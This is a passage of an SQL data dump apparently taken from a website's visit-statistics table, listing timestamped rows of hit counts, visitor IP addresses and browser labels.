37',''),(22351,1458239462,1,0,1,0,'66.249.78.144',''),(22352,1458239602,1,1,0,0,'91.196.178.98','chrome'),(22353,1458239625,3,3,0,0,'82.193.127.15','other'),(22354,1458239659,1,1,0,0,'141.8.184.18','other'),(22355,1458240076,1,1,0,0,'66.102.9.127','chrome'),(22356,1458240121,1,1,0,0,'164.132.161.80','other'),(22357,1458240343,1,1,0,0,'51.255.65.62','other'),(22358,1458240693,1,1,0,0,'66.249.78.158','other'),(22359,1458241366,1,1,0,0,'51.255.65.92','other'),(22360,1458241370,1,1,0,0,'66.249.92.103','other'),(22361,1458241611,1,1,0,0,'207.46.13.138','other'),(22362,1458242294,2,2,0,0,'66.249.78.44','other'),(22363,1458242572,1,1,0,0,'193.194.127.217','firefox'),(22364,1458242598,1,1,0,0,'164.132.161.12','other'),(22365,1458242760,1,1,0,0,'51.255.65.63','other'),(22366,1458243489,1,0,1,0,'66.249.78.44',''),(22367,1458243826,1,1,0,0,'95.133.10.164','firefox'),(22368,1458243878,1,1,0,0,'207.46.13.93','other'),(22369,1458244497,1,1,0,0,'217.69.143.49','other'),(22370,1458244659,3,3,0,0,'66.249.78.158','other'),(22371,1458244954,1,1,0,0,'164.132.161.15','other'),(22372,1458245065,1,1,0,0,'66.249.78.44','other'),(22373,1458245152,1,1,0,0,'66.249.78.151','other'),(22374,1458245261,1,1,0,0,'66.249.78.37','other'),(22375,1458245934,4,4,0,0,'91.209.51.22','other'),(22376,1458245961,5,5,0,0,'82.193.127.15','other'),(22377,1458246038,1,1,0,0,'164.132.161.91','other'),(22378,1458246040,1,1,0,0,'8.29.198.26','other'),(22379,1458246061,1,1,0,0,'217.69.143.43','other'),(22380,1458246758,1,1,0,0,'217.69.143.57','other'),(22381,1458247029,1,1,0,0,'51.255.36.87','other'),(22382,1458247337,1,0,1,0,'68.180.230.170',''),(22383,1458247407,2,2,0,0,'141.8.184.18','other'),(22384,1458247479,1,0,1,0,'66.249.66.162',''),(22385,1458248560,1,1,0,0,'164.132.161.24','other'),(22386,1458248810,2,2,0,0,'207.46.13.77','other'),(22387,1458249024,2,0,2,0,'68.180.230.170',''),(22388,1458249047,1,1,0,0,'51.255.65.97','other'),(22389,1458249079,1,1,0,0,'51.255.65.84','other'),(22390,1458249116,1,1,0,0,'51.255.65.68','other'),(22391,1458249211,1,1,0,0,'66.249.78.30','other'),(22392,1458249242,1,1,0,0,'93.115.95.207','chrome'),(22393,1458249272,1,1,0,0,'51.255.65.5','other'),(22394,1458249415,1,1,0,0,'66.249.66.133','other'),(22395,1458249435,1,1,0,0,'164.132.161.46','other'),(22396,1458249451,1,1,0,0,'66.249.78.37','other'),(22397,1458250264,1,1,0,0,'66.249.78.44','other'),(22398,1458250343,2,1,1,0,'66.249.78.151',''),(22399,1458250353,1,0,1,0,'68.180.230.170',''),(22400,1458250744,4,4,0,0,'207.46.13.138','other'),(22401,1458250749,2,2,0,0,'207.46.13.93','other'),(22402,1458251718,5,5,0,0,'40.77.167.60','other'),(22403,1458251837,1,1,0,0,'164.132.161.28','other'),(22404,1458252071,1,1,0,0,'51.255.65.97','other'),(22405,1458252109,1,1,0,0,'217.69.143.42','other'),(22406,1458252202,1,0,1,0,'66.249.78.151',''),(22407,1458252321,1,1,0,0,'66.249.92.103','other'),(22408,1458252576,1,0,1,0,'66.249.78.144',''),(22409,1458253254,1,1,0,0,'141.8.184.11','other'),(22410,1458253257,1,1,0,0,'178.154.149.11','other'),(22411,1458253739,1,1,0,0,'164.132.161.58','other'),(22412,1458254283,6,6,0,0,'178.154.189.204','other'),(22413,1458254632,2,2,0,0,'130.193.51.102','other'),(22414,1458254636,1,1,0,0,'130.193.50.31','other'),(22415,1458254639,2,2,0,0,'5.255.253.110','other'),(22416,1458254651,1,1,0,0,'141.8.142.8','other'),(22417,1458255172,1,0,1,0,'66.249.78.144',''),(22418,1458255392,1,1,0,0,'180.76.15.18','other'),(22419,1458255713,1,0,1,0,'68.180.230.170',''),(22420,1458255731,2,1,1,0,'66.249.78.37',''),(22421,1458255748,5,5,0,0,'66.249.78.144','other'),(22422,1458255759,1,1,0,0,'66.249.78.151','other'),(22423,1458256010,1,1,0,0,'66.249.66.166','other'),(22424,1458256066,1,1,0,0,'141.8.184.22','other'),(22425,1458256069,1,1,0,0,'130.193.51.102','other'),(22426,1458256072,3,3,0,0,'141.8.184.18','other'),(22427,1458256586,1,0,1,0,'66.249.78.158',''),(22428,1458256941,1,1,0,0,'8.29.198.25','other'),(22429,1458257026,1,1,0,0,'66.249.78.151','other'),(22430,1458257049,2,1,1,0,'66.249.78.144',''),(22431,1458257102,1,1,0,0,'51.255.65.55','other'),(22432,1458257145,1,1,0,0,'164.132.161.85','other'),(22433,1458257393,1,1,0,0,'141.8.142.41','other'),(22434,1458257396,1,1,0,0,'141.8.184.6','other'),(22435,1458257397,1,1,0,0,'141.8.132.66','other'),(22436,1458257400,1,1,0,0,'130.193.51.81','other'),(22437,1458257401,1,1,0,0,'93.158.152.9','other'),(22438,1458257404,1,1,0,0,'141.8.184.31','other'),(22439,1458257498,1,1,0,0,'66.249.78.144','other'),(22440,1458257687,1,1,0,0,'62.210.215.100','chrome'),(22441,1458257990,1,1,0,0,'141.8.132.48','other'),(22442,1458258033,1,1,0,0,'5.255.253.17','other'),(22443,1458258052,1,1,0,0,'164.132.161.3','other'),(22444,1458258101,1,1,0,0,'141.8.142.60','other'),(22445,1458258486,6,0,6,0,'66.249.78.144',''),(22446,1458258838,1,1,0,0,'66.249.66.133','other'),(22447,1458259237,1,0,1,0,'66.249.78.37',''),(22448,1458259373,2,0,2,0,'66.249.66.158',''),(22449,1458259563,1,1,0,0,'207.46.13.138','other'),(22450,1458259598,1,1,0,0,'141.8.184.6','other'),(22451,1458259601,2,2,0,0,'93.158.152.65','other'),(22452,1458259605,2,2,0,0,'5.255.253.89','other'),(22453,1458259619,2,2,0,0,'5.255.253.51','other'),(22454,1458259622,1,1,0,0,'5.255.253.62','other'),(22455,1458259625,2,2,0,0,'141.8.132.109','other'),(22456,1458259629,1,1,0,0,'141.8.142.60','other'),(22457,1458259632,3,3,0,0,'141.8.132.74','other'),(22458,1458259636,3,3,0,0,'5.255.253.17','other'),(22459,1458259640,2,2,0,0,'130.193.51.55','other'),(22460,1458259644,1,1,0,0,'93.158.152.9','other'),(22461,1458259647,2,2,0,0,'130.193.50.31','other'),(22462,1458259651,1,1,0,0,'130.193.51.85','other'),(22463,1458259655,1,1,0,0,'141.8.184.31','other'),(22464,1458259662,3,3,0,0,'130.193.50.22','other'),(22465,1458259670,2,2,0,0,'178.154.189.12','other'),(22466,1458259673,3,3,0,0,'141.8.132.66','other'),(22467,1458259676,1,0,1,0,'66.249.66.166',''),(22468,1458259677,2,2,0,0,'130.193.51.22','other'),(22469,1458259680,1,1,0,0,'130.193.51.43','other'),(22470,1458259684,1,1,0,0,'141.8.132.48','other'),(22471,1458259688,3,3,0,0,'130.193.51.50','other'),(22472,1458259692,2,2,0,0,'130.193.37.21','other'),(22473,1458259696,1,1,0,0,'130.193.51.45','other'),(22474,1458259700,1,1,0,0,'130.193.51.102','other'),(22475,1458259712,1,1,0,0,'141.8.132.44','other'),(22476,1458259727,1,1,0,0,'141.8.132.99','other'),(22477,1458259742,1,1,0,0,'141.8.142.82','other'),(22478,1458259758,2,2,0,0,'141.8.142.41','other'),(22479,1458259762,2,2,0,0,'178.154.189.6','other'),(22480,1458259766,1,1,0,0,'141.8.132.79','other'),(22481,1458259774,1,1,0,0,'5.255.253.103','other'),(22482,1458259807,1,1,0,0,'5.255.253.94','other'),(22483,1458259885,1,0,1,0,'66.249.78.151',''),(22484,1458259930,1,1,0,0,'51.255.65.44','other'),(22485,1458259947,3,3,0,0,'173.234.159.250','other'),(22486,1458260595,4,1,3,0,'66.249.78.144',''),(22487,1458261124,1,0,1,0,'66.249.78.151',''),(22488,1458261453,1,1,0,0,'66.249.78.158','other'),(22489,1458261499,1,1,0,0,'66.249.66.162','other'),(22490,1458261507,1,0,1,0,'66.249.78.144',''),(22491,1458261705,1,1,0,0,'207.46.13.138','other'),(22492,1458261757,1,0,1,0,'68.180.230.170',''),(22493,1458261866,2,2,0,0,'66.249.78.144','other'),(22494,1458262761,1,1,0,0,'51.255.65.38','other'),(22495,1458262840,1,1,0,0,'66.249.92.103','other'),(22496,1458262930,1,1,0,0,'66.249.78.30','other'),(22497,1458263315,1,1,0,0,'217.69.143.46','other'),(22498,1458263352,1,1,0,0,'164.132.161.7','other'),(22499,1458263789,3,1,2,0,'66.249.78.151',''),(22500,1458263920,1,1,0,0,'141.8.132.109','other'),(22501,1458264942,1,1,0,0,'66.249.78.30','other'),(22502,1458265139,1,0,1,0,'68.180.230.170',''),(22503,1458265390,1,0,1,0,'66.249.78.151',''),(22504,1458265766,1,1,0,0,'93.158.152.26','other'),(22505,1458265769,1,1,0,0,'93.158.152.9','other'),(22506,1458265773,1,1,0,0,'141.8.142.8','other'),(22507,1458266035,1,1,0,0,'178.255.215.95','other'),(22508,1458266792,1,0,1,0,'66.249.78.151',''),(22509,1458267115,1,1,0,0,'51.255.65.45','other'),(22510,1458267819,2,2,0,0,'141.8.184.18','other'),(22511,1458267823,1,1,0,0,'141.8.183.14','other'),(22512,1458267827,3,3,0,0,'93.158.152.9','other'),(22513,1458267857,1,1,0,0,'8.29.198.26','other'),(22514,1458268218,5,5,0,0,'94.154.239.69','other'),(22515,1458268240,1,1,0,0,'66.249.78.30','other'),(22516,1458268751,1,1,0,0,'180.76.15.7','other'),(22517,1458268935,1,1,0,0,'66.249.78.158','other'),(22518,1458269955,13,13,0,0,'141.8.184.18','other'),(22519,1458269959,1,1,0,0,'141.8.183.14','other'),(22520,1458270195,1,1,0,0,'66.249.78.158','other'),(22521,1458270328,1,1,0,0,'93.158.152.9','other'),(22522,1458270349,1,1,0,0,'178.154.149.11','other'),(22523,1458271303,1,1,0,0,'66.249.78.37','other'),(22524,1458271369,1,0,1,0,'66.249.78.44',''),(22525,1458271787,2,1,1,0,'66.249.78.158',''),(22526,1458271806,2,0,2,0,'66.249.78.151',''),(22527,1458272378,2,2,0,0,'217.69.143.55','other'),(22528,1458272437,1,1,0,0,'66.249.78.44','other'),(22529,1458272918,3,1,2,0,'66.249.78.151',''),(22530,1458273038,2,2,0,0,'180.76.15.20','other'),(22531,1458273081,1,1,0,0,'66.249.92.99','other'),(22532,1458273495,2,2,0,0,'113.161.8.165','other'),(22533,1458273550,1,0,1,0,'66.249.66.166',''),(22534,1458273588,1,0,1,0,'66.249.78.144',''),(22535,1458273653,2,1,1,0,'66.249.78.144',''),(22536,1458273729,1,1,0,0,'66.249.78.37','other'),(22537,1458274003,2,0,2,0,'66.249.78.158',''),(22538,1458274090,2,1,1,0,'66.249.78.151',''),(22539,1458274116,1,1,0,0,'82.193.127.15','other'),(22540,1458274140,1,1,0,0,'217.69.143.61','other'),(22541,1458274183,1,1,0,0,'217.69.143.44','other'),(22542,1458274230,1,1,0,0,'207.46.13.93','other'),(22543,1458274455,1,1,0,0,'66.249.66.158','other'),(22544,1458274682,1,1,0,0,'178.154.189.204','other'),(22545,1458274776,2,1,1,0,'66.249.78.144',''),(22546,1458275002,1,1,0,0,'66.249.78.158','other'),(22547,1458275147,4,4,0,0,'141.8.184.18','other'),(22548,1458275164,1,1,0,0,'130.193.37.21','other'),(22549,1458275168,1,1,0,0,'141.8.132.99','other'),(22550,1458275173,1,1,0,0,'5.255.253.53','other'),(22551,1458275177,1,1,0,0,'178.154.149.11','other'),(22552,1458275181,1,1,0,0,'141.8.183.14','other'),(22553,1458275392,1,1,0,0,'164.132.161.25','other'),(22554,1458276924,1,1,0,0,'51.255.65.19','other'),(22555,1458277039,1,1,0,0,'51.255.65.84','other'),(22556,1458277055,1,1,0,0,'66.249.78.158','other'),(22557,1458277488,3,3,0,0,'178.154.149.11','other'),(22558,1458277493,1,1,0,0,'5.255.253.53','other'),(22559,1458277501,1,1,0,0,'141.8.183.14','other'),(22560,1458277505,1,1,0,0,'93.158.152.9','other'),(22561,1458277514,1,1,0,0,'141.8.184.18','other'),(22562,1458278378,1,1,0,0,'207.46.13.138','other'),(22563,1458278541,1,0,1,0,'66.249.78.151',''),(22564,1458278819,1,1,0,0,'8.29.198.25','other'),(22565,1458279427,1,1,0,0,'51.255.65.16','other'),(22566,1458279708,1,1,0,0,'51.255.65.4','other'),(22567,1458279877,1,1,0,0,'66.249.78.158','other'),(22568,1458279908,2,2,0,0,'78.111.185.54','chrome'),(22569,1458280620,1,1,0,0,'217.69.143.55','other'),(22570,1458280877,1,1,0,0,'94.179.37.80','firefox'),(22571,1458280932,1,0,1,0,'66.249.78.151',''),(22572,1458280984,1,1,0,0,'217.69.143.43','other'),(22573,1458280985,1,1,0,0,'217.69.143.44','other'),(22574,1458281230,1,0,1,0,'66.249.66.129',''),(22575,1458281712,1,1,0,0,'157.55.39.78','other'),(22576,1458282761,1,1,0,0,'178.154.149.11','other'),(22577,1458282765,1,1,0,0,'130.193.50.22','other'),(22578,1458282770,1,1,0,0,'130.193.51.85','other'),(22579,1458282774,1,1,0,0,'141.8.132.99','other'),(22580,1458282797,2,2,0,0,'5.255.253.100','other'),(22581,1458282802,1,1,0,0,'141.8.142.82','other'),(22582,1458282806,1,1,0,0,'5.255.253.62','other'),(22583,1458283004,4,4,0,0,'91.209.51.22','other'),(22584,1458283038,1,0,1,0,'66.249.78.151',''),(22585,1458283404,1,1,0,0,'66.249.78.158','other'),(22586,1458283524,3,3,0,0,'77.248.252.113','other'),(22587,1458283620,1,1,0,0,'66.249.92.99','other'),(22588,1458283852,1,1,0,0,'207.46.13.138','other'),(22589,1458284170,1,1,0,0,'176.241.109.84','firefox'),(22590,1458284230,1,1,0,0,'130.193.51.43','other'),(22591,1458284235,1,1,0,0,'141.8.184.6','other'),(22592,1458284399,1,1,0,0,'95.132.31.100','firefox'),(22593,1458284455,1,1,0,0,'180.76.15.33','other'),(22594,1458284736,1,1,0,0,'95.135.21.250','chrome'),(22595,1458284967,1,0,1,0,'66.249.78.144',''),(22596,1458285220,1,1,0,0,'94.179.106.218','firefox'),(22597,1458285296,1,1,0,0,'51.255.66.151','other'),(22598,1458285377,1,1,0,0,'91.196.178.70','chrome'),(22599,1458285441,1,1,0,0,'217.69.143.51','other'),(22600,1458285509,1,1,0,0,'78.111.185.231','firefox'),(22601,1458285600,1,1,0,0,'159.203.119.48','other'),(22602,1458285821,1,1,0,0,'178.95.246.242','chrome'),(22603,1458285970,2,0,2,0,'66.249.66.166',''),(22604,1458286036,1,0,1,0,'66.249.66.162',''),(22605,1458286167,1,1,0,0,'78.111.25.57','chrome'),(22606,1458286186,1,1,0,0,'66.249.93.94','chrome'),(22607,1458286577,1,1,0,0,'217.69.143.69','other'),(22608,1458286639,1,0,1,0,'66.249.78.144',''),(22609,1458286662,1,1,0,0,'217.69.143.43','other'),(22610,1458286694,1,0,1,0,'66.249.78.158',''),(22611,1458286814,1,1,0,0,'51.255.65.8','other'),(22612,1458286974,1,1,0,0,'141.8.132.79','other'),(22613,1458286978,1,1,0,0,'141.8.142.10','other'),(22614,1458286983,1,1,0,0,'130.193.37.21','other'),(22615,1458286984,1,1,0,0,'207.46.13.93','other'),(22616,1458287126,1,1,0,0,'180.76.15.136','other'),(22617,1458287214,1,1,0,0,'217.69.143.68','other'),(22618,1458287607,1,1,0,0,'37.53.90.175','firefox'),(22619,1458287685,1,0,1,0,'66.249.78.158',''),(22620,1458287926,2,2,0,0,'46.175.142.10','chrome'),(22621,1458288050,1,1,0,0,'157.55.39.64','other'),(22622,1458288162,1,1,0,0,'207.46.13.138','other'),(22623,1458288362,1,1,0,0,'141.0.15.7','other'),(22624,1458288526,1,1,0,0,'213.159.246.95','firefox'),(22625,1458288550,1,1,0,0,'66.249.78.158','other'),(22626,1458288571,1,1,0,0,'157.55.39.78','other'),(22627,1458288578,1,1,0,0,'66.249.78.144','other'),(22628,1458288588,1,1,0,0,'66.249.66.158','other'),(22629,1458288996,1,1,0,0,'141.8.142.8','other'),(22630,1458289000,1,1,0,0,'93.158.152.26','other'),(22631,1458289004,1,1,0,0,'141.8.132.79','other'),(22632,1458289008,1,1,0,0,'5.255.253.100','other'),(22633,1458289010,1,1,0,0,'164.132.161.71','other'),(22634,1458289509,2,0,2,0,'66.249.78.151',''),(22635,1458289856,1,1,0,0,'157.55.39.78','other'),(22636,1458289897,1,1,0,0,'8.29.198.26','other'),(22637,1458290358,1,1,0,0,'95.133.7.67','chrome'),(22638,1458290377,1,0,1,0,'66.249.66.162',''),(22639,1458290620,1,1,0,0,'207.46.13.138','other'),(22640,1458290959,1,1,0,0,'40.77.167.98','other'),(22641,1458291712,1,0,1,0,'66.249.66.158',''),(22642,1458292032,1,1,0,0,'95.135.38.41','chrome'),(22643,1458292188,1,1,0,0,'151.80.31.104','other'),(22644,1458292207,1,1,0,0,'78.111.187.49','chrome'),(22645,1458292761,1,1,0,0,'91.196.178.65','firefox'),(22646,1458292895,1,1,0,0,'51.255.65.19','other'),(22647,1458293521,1,1,0,0,'94.179.37.80','firefox'),(22648,1458293524,1,1,0,0,'178.140.234.30','msie'),(22649,1458293526,1,1,0,0,'188.244.36.217','msie'),(22650,1458293531,1,1,0,0,'37.204.202.163','msie'),(22651,1458293535,1,1,0,0,'95.26.213.82','msie'),(22652,1458293540,1,1,0,0,'93.80.176.159','msie'),(22653,1458293597,1,1,0,0,'91.196.178.129','chrome'),(22654,1458293686,1,1,0,0,'91.196.178.65','firefox'),(22655,1458293876,1,0,1,0,'66.249.78.158',''),(22656,1458294330,1,1,0,0,'123.125.71.77','other'),(22657,1458294385,1,1,0,0,'66.249.92.99','other'),(22658,1458294830,1,0,1,0,'66.249.78.158',''),(22659,1458295698,1,1,0,0,'37.53.90.175','firefox'),(22660,1458295745,2,0,2,0,'66.249.78.144',''),(22661,1458295961,1,0,1,0,'66.249.66.158',''),(22662,1458296001,1,1,0,0,'149.202.98.160','chrome'),(22663,1458296252,1,1,0,0,'164.132.161.29','other'),(22664,1458296403,1,1,0,0,'151.80.31.179','other'),(22665,1458296622,1,0,1,0,'66.249.78.158',''),(22666,1458296983,1,1,0,0,'31.41.70.6','chrome'),(22667,1458297123,1,0,1,0,'66.249.78.144',''),(22668,1458297487,1,1,0,0,'188.32.149.105','chrome'),(22670,1458297488,1,1,0,0,'37.110.50.207','opera'),(22672,1458297489,1,1,0,0,'95.26.37.96','chrome'),(22673,1458297518,1,0,1,0,'66.249.66.162',''),(22674,1458297809,1,1,0,0,'66.249.66.158','other'),(22675,1458298151,1,1,0,0,'91.213.33.104','chrome'),(22676,1458298362,1,1,0,0,'91.196.178.66','firefox'),(22677,1458298519,1,1,0,0,'78.111.187.118','chrome'),(22678,1458298803,1,1,0,0,'66.249.93.86','chrome'),(22679,1458299191,39,39,0,0,'212.83.178.134','firefox'),(22680,1458299194,4,4,0,0,'212.83.178.134','other'),(22681,1458299397,1,1,0,0,'66.102.9.104','chrome'),(22682,1458299678,1,1,0,0,'66.249.78.144','other'),(22683,1458299699,1,1,0,0,'66.249.78.37','other'),(22684,1458300664,1,0,1,0,'66.249.78.158',''),(22685,1458300765,1,1,0,0,'207.46.13.138','other'),(22686,1458300792,1,1,0,0,'157.55.39.78','other'),(22687,1458300798,1,1,0,0,'8.29.198.26','other'),(22688,1458300924,1,1,0,0,'66.249.78.158','other'),(22689,1458301216,1,1,0,0,'185.41.21.50','chrome'),(22690,1458301221,1,0,1,0,'68.180.229.235',''),(22691,1458301459,1,1,0,0,'91.196.178.69','firefox'),(22692,1458301911,1,1,0,0,'94.179.37.80','firefox'),(22693,1458302065,1,1,0,0,'31.23.129.196','chrome'),(22694,1458302881,1,1,0,0,'207.46.13.138','other'),(22695,1458302981,1,1,0,0,'194.44.45.187','firefox'),(22696,1458303393,2,1,1,0,'66.249.78.158',''),(22697,1458303555,1,1,0,0,'217.69.143.68','other'),(22698,1458303799,1,0,1,0,'66.249.78.30',''),(22699,1458303811,1,0,1,0,'66.249.66.162',''),(22700,1458303969,1,0,1,0,'66.249.78.151',''),(22701,1458304138,1,1,0,0,'51.255.66.162','other'),(22702,1458304350,2,2,0,0,'51.255.65.3','other'),(22703,1458304372,233,233,0,0,'82.193.127.15','other'),(22704,1458304597,1,1,0,0,'141.8.132.109','other'),(22705,1458304965,1,1,0,0,'51.255.65.68','other'),(22706,1458305060,1,1,0,0,'66.249.92.95','other'),(22707,1458305275,67,67,0,0,'82.193.127.15','other'),(22708,1458305284,1,1,0,0,'91.196.176.13','chrome'),(22709,1458305530,3,1,2,0,'66.249.78.144',''),(22710,1458305556,1,0,1,0,'66.249.78.37',''),(22711,1458305626,55,55,0,0,'109.87.138.56','other'),(22712,1458305941,1,0,1,0,'68.180.229.235',''),(22713,1458305950,1,1,0,0,'91.196.178.72','chrome'),(22714,1458306029,1,1,0,0,'217.69.143.55','other'),(22715,1458306058,1,1,0,0,'94.178.254.39','chrome'),(22716,1458306200,3,2,1,0,'66.249.78.144',''),(22717,1458306368,2,2,0,0,'66.249.78.151','other'),(22718,1458306477,1,1,0,0,'51.255.66.105','other'),(22719,1458306951,2,2,0,0,'66.249.78.144','other'),(22720,1458307168,1,1,0,0,'91.196.178.72','chrome'),(22721,1458307705,1,1,0,0,'78.111.190.206','chrome'),(22722,1458307922,1,1,0,0,'66.249.78.44','other'),(22723,1458307992,2,0,2,0,'66.249.78.158',''),(22724,1458308093,1,1,0,0,'164.132.161.61','other'),(22725,1458308194,3,3,0,0,'91.196.178.72','chrome'),(22726,1458308300,1,0,1,0,'66.249.78.144',''),(22727,1458308418,1,1,0,0,'164.132.161.68','other'),(22728,1458308750,1,1,0,0,'207.46.13.138','other'),(22729,1458308801,1,1,0,0,'217.69.143.60','other'),(22730,1458308802,1,1,0,0,'217.69.143.57','other'),(22731,1458309192,1,0,1,0,'66.249.78.151',''),(22732,1458309216,3,0,3,0,'66.249.66.158',''),(22733,1458309242,8,0,8,0,'66.249.78.144',''),(22734,1458309243,2,0,2,0,'66.249.78.30',''),(22735,1458309382,1,1,0,0,'46.211.153.128','chrome'),(22736,1458309390,1,1,0,0,'46.211.156.249','chrome'),(22737,1458309516,1,1,0,0,'130.193.51.45','other'),(22738,1458309520,1,1,0,0,'130.193.51.43','other'),(22739,1458309695,1,1,0,0,'51.255.66.127','other'),(22740,1458310136,1,1,0,0,'66.249.78.151','other'),(22741,1458310155,1,1,0,0,'66.249.78.44','other'),(22742,1458310787,1,1,0,0,'46.164.133.122','chrome'),(22743,1458310862,1,1,0,0,'164.132.161.49','other'),(22744,1458311007,1,1,0,0,'51.255.65.66','other'),(22745,1458311223,1,1,0,0,'46.211.154.116','chrome'),(22746,1458311340,4,4,0,0,'144.76.8.132','other'),(22747,1458311400,1,1,0,0,'85.115.62.180','other'),(22748,1458311824,1,0,1,0,'68.180.229.235',''),(22749,1458311938,1,0,1,0,'66.249.78.151',''),(22750,1458312209,1,1,0,0,'8.29.198.26','other'),(22751,1458312241,2,2,0,0,'141.8.183.14','other'),(22752,1458312265,2,2,0,0,'5.255.253.100','other'),(22753,1458312269,2,2,0,0,'5.255.253.53','other'),(22754,1458312470,1,1,0,0,'141.8.184.18','other'),(22755,1458312480,1,1,0,0,'141.8.132.99','other'),(22756,1458312653,1,1,0,0,'51.255.65.7','other'),(22757,1458312812,1,1,0,0,'95.132.45.171','opera'),(22758,1458312975,1,0,1,0,'68.180.229.235',''),(22759,1458313392,1,0,1,0,'66.249.78.151',''),(22760,1458313568,1,1,0,0,'217.69.143.58','other'),(22761,1458313675,1,1,0,0,'51.255.65.61','other'),(22762,1458313731,2,0,2,0,'66.249.78.30',''),(22763,1458314898,1,1,0,0,'151.80.31.174','other'),(22764,1458315070,1,1,0,0,'51.255.65.91','other'),(22765,1458315276,1,1,0,0,'51.255.66.150','other'),(22766,1458315280,1,0,1,0,'66.249.78.144',''),(22767,1458315390,1,1,0,0,'207.46.13.93','other'),(22768,1458315609,1,0,1,0,'66.249.78.158',''),(22769,1458315721,1,1,0,0,'66.249.92.103','other'),(22770,1458315907,1,1,0,0,'51.255.65.16','other'),(22771,1458315935,1,1,0,0,'46.201.240.112','firefox'),(22772,1458316223,1,1,0,0,'66.249.78.158','other'),(22773,1458316314,1,0,1,0,'66.249.78.144',''),(22774,1458316604,3,1,2,0,'66.249.78.151',''),(22775,1458316906,1,1,0,0,'51.255.65.16','other'),(22776,1458317031,1,1,0,0,'91.196.178.163','chrome'),(22777,1458317172,1,1,0,0,'66.249.78.144','other'),(22778,1458318105,1,1,0,0,'66.249.78.144','other'),(22779,1458318490,1,1,0,0,'51.255.65.61','other'),(22780,1458318579,1,1,0,0,'51.255.66.148','other'),(22781,1458319220,1,1,0,0,'66.249.78.30','other'),(22782,1458319287,5,5,0,0,'66.249.78.144','other'),(22783,1458319318,1,1,0,0,'51.255.66.185','other'),(22784,1458319426,3,3,0,0,'82.193.127.15','other'),(22785,1458319441,1,1,0,0,'37.57.0.193','chrome'),(22786,1458319767,1,1,0,0,'151.80.31.163','other'),(22787,1458320126,1,0,1,0,'66.249.78.151',''),(22788,1458320170,1,1,0,0,'164.132.161.51','other'),(22789,1458320179,1,0,1,0,'68.180.229.235',''),(22790,1458320202,1,1,0,0,'40.77.167.98','other'),(22791,1458320250,2,2,0,0,'66.249.78.151','other'),(22792,1458320317,4,4,0,0,'66.249.78.158','other'),(22793,1458320542,1,1,0,0,'151.80.31.184','other'),(22794,1458320813,4,3,1,0,'66.249.78.144',''),(22795,1458320994,1,1,0,0,'51.255.65.90','other'),(22796,1458321196,1,1,0,0,'66.249.66.162','other'),(22797,1458321375,1,1,0,0,'78.111.190.204','chrome'),(22798,1458321953,1,0,1,0,'68.180.229.235',''),(22799,1458322223,2,2,0,0,'66.249.78.151','other'),(22800,1458322263,1,1,0,0,'66.249.66.162','other'),(22801,1458322361,1,1,0,0,'51.255.65.26','other'),(22802,1458322681,2,2,0,0,'66.249.78.158','other'),(22803,1458322724,1,1,0,0,'37.54.17.212','firefox'),(22804,1458322752,1,1,0,0,'66.249.66.158','other'),(22805,1458322874,2,2,0,0,'66.249.78.144','other'),(22806,1458322876,1,1,0,0,'157.55.39.78','other'),(22807,1458323086,1,1,0,0,'8.29.198.26','other'),(22808,1458323119,1,0,1,0,'66.249.78.44',''),(22809,1458323120,1,0,1,0,'66.249.66.133',''),(22810,1458323220,1,1,0,0,'164.132.161.76','other'),(22811,1458323676,1,1,0,0,'51.255.65.46','other'),(22812,1458323922,1,1,0,0,'93.183.204.29','firefox'),(22813,1458324164,1,1,0,0,'91.196.178.68','chrome'),(22814,1458324395,1,1,0,0,'207.46.13.93','other'),(22815,1458324860,1,0,1,0,'66.249.78.151',''),(22816,1458325111,1,1,0,0,'164.132.161.18','other'),(22817,1458325155,1,1,0,0,'66.249.66.166','other'),(22818,1458325171,1,0,1,0,'66.249.78.144',''),(22819,1458325513,1,1,0,0,'91.196.178.163','chrome'),(22820,1458325616,4,0,4,0,'68.180.229.235',''),(22821,1458325688,1,1,0,0,'93.171.243.16','chrome'),(22822,1458325901,1,0,1,0,'66.249.78.30',''),(22823,1458326234,1,1,0,0,'91.196.178.167','firefox'),(22824,1458326430,1,1,0,0,'66.249.92.99','other'),(22825,1458326477,1,1,0,0,'217.69.133.191','other'),(22826,1458326793,1,1,0,0,'91.124.182.203','firefox'),(22827,1458326803,1,1,0,0,'92.113.127.60','chrome'),(22828,1458326860,1,1,0,0,'164.132.161.92','other'),(22829,1458327236,1,1,0,0,'151.80.31.171','other'),(22830,1458327777,3,0,3,0,'66.249.78.151',''),(22831,1458328255,1,1,0,0,'207.46.13.93','other'),(22832,1458328279,102,102,0,0,'5.9.111.70','other'),(22833,1458328354,1,1,0,0,'141.0.14.162','other'),(22834,1458328539,1,1,0,0,'51.255.65.93','other'),(22835,1458329651,3,0,3,0,'68.180.229.235',''),(22836,1458330044,1,0,1,0,'66.249.78.151',''),(22837,1458330294,1,1,0,0,'164.132.161.18','other'),(22838,1458330762,3,3,0,0,'40.77.167.8','other'),(22839,1458331206,1,1,0,0,'164.132.161.12','other'),(22840,1458331246,1,1,0,0,'66.249.78.158','other'),(22841,1458331276,2,2,0,0,'66.249.78.151','other'),(22842,1458331337,1,1,0,0,'217.69.143.61','other'),(22843,1458331355,1,1,0,0,'66.249.78.44','other'),(22844,1458331403,1,1,0,0,'66.249.66.133','other'),(22845,1458331439,4,0,4,0,'66.249.78.144',''),(22846,1458331619,1,0,1,0,'66.249.66.166',''),(22847,1458331834,1,1,0,0,'94.179.95.182','chrome'),(22848,1458332201,1,1,0,0,'151.80.31.183','other'),(22849,1458332226,1,1,0,0,'46.219.18.62','chrome'),(22850,1458332247,1,1,0,0,'40.77.167.8','other'),(22851,1458332491,1,1,0,0,'62.210.215.100','chrome'),(22852,1458332723,1,1,0,0,'51.255.66.119','other'),(22853,1458333079,1,1,0,0,'182.118.22.202','msie'),(22854,1458333573,1,1,0,0,'164.132.161.76','other'),(22855,1458333951,1,1,0,0,'8.29.198.26','other'),(22856,1458334201,1,1,0,0,'51.255.65.40','other'),(22857,1458334371,1,0,1,0,'66.249.78.158',''),(22858,1458334395,2,0,2,0,'68.180.229.235',''),(22859,1458334982,1,0,1,0,'66.249.66.158',''),(22860,1458335056,1,1,0,0,'51.255.66.180','other'),(22861,1458335388,1,1,0,0,'62.210.215.100','chrome'),(22862,1458336097,1,0,1,0,'68.180.229.235',''),(22863,1458336110,1,1,0,0,'217.69.143.58','other'),(22864,1458336376,1,1,0,0,'151.80.31.163','other'),(22865,1458336750,1,1,0,0,'5.255.253.79','other'),(22866,1458337342,1,1,0,0,'144.76.93.46','other'),(22867,1458337394,1,1,0,0,'93.158.152.65','other'),(22868,1458337949,1,1,0,0